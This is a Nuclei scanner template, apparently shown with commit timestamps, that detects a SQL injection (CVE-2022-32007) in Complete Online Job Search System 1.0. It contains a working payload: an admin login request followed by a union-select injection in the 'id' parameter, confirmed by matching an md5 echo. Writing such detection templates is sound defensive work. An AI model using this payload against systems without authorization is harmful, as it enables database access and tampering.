nuclei-templates/http/cves/2022/CVE-2022-32007.yaml

46 lines
1.6 KiB
YAML
Raw Normal View History

2022-07-16 20:42:01 +00:00
id: CVE-2022-32007
info:
name: Complete Online Job Search System 1.0 - SQL Injection
2022-07-16 20:42:01 +00:00
author: arafatansari
severity: high
2022-07-16 20:42:01 +00:00
description: |
Complete Online Job Search System 1.0 contains a SQL injection vulnerability via /eris/admin/company/index.php?view=edit&id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
2022-07-16 20:42:01 +00:00
reference:
- https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/online-job-search-system/SQLi-2.md
2022-07-19 09:07:54 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-32007
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2022-32007
cwe-id: CWE-89
2023-07-11 19:49:27 +00:00
epss-score: 0.00549
cpe: cpe:2.3:a:complete_online_job_search_system_project:complete_online_job_search_system:1.0:*:*:*:*:*:*:*
2022-07-19 09:09:48 +00:00
metadata:
max-request: 2
2023-06-04 08:13:42 +00:00
verified: true
2023-07-11 19:49:27 +00:00
vendor: complete_online_job_search_system_project
product: complete_online_job_search_system
2022-07-19 09:07:54 +00:00
tags: cve,cve2022,sqli,eris,authenticated
variables:
num: "999999999"
2022-07-16 20:42:01 +00:00
http:
2022-07-16 20:42:01 +00:00
- raw:
- |
POST /admin/login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2022-07-19 09:07:54 +00:00
user_email={{username}}&user_pass={{password}}&btnLogin=
2022-07-16 20:42:01 +00:00
- |
2022-07-19 09:07:54 +00:00
GET /admin/company/index.php?view=edit&id=-3%27%20union%20select%201,md5({{num}}),3,4,5,6--+ HTTP/1.1
2022-07-16 20:42:01 +00:00
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: word
part: body
words:
2022-07-19 09:07:54 +00:00
- '{{md5({{num}})}}'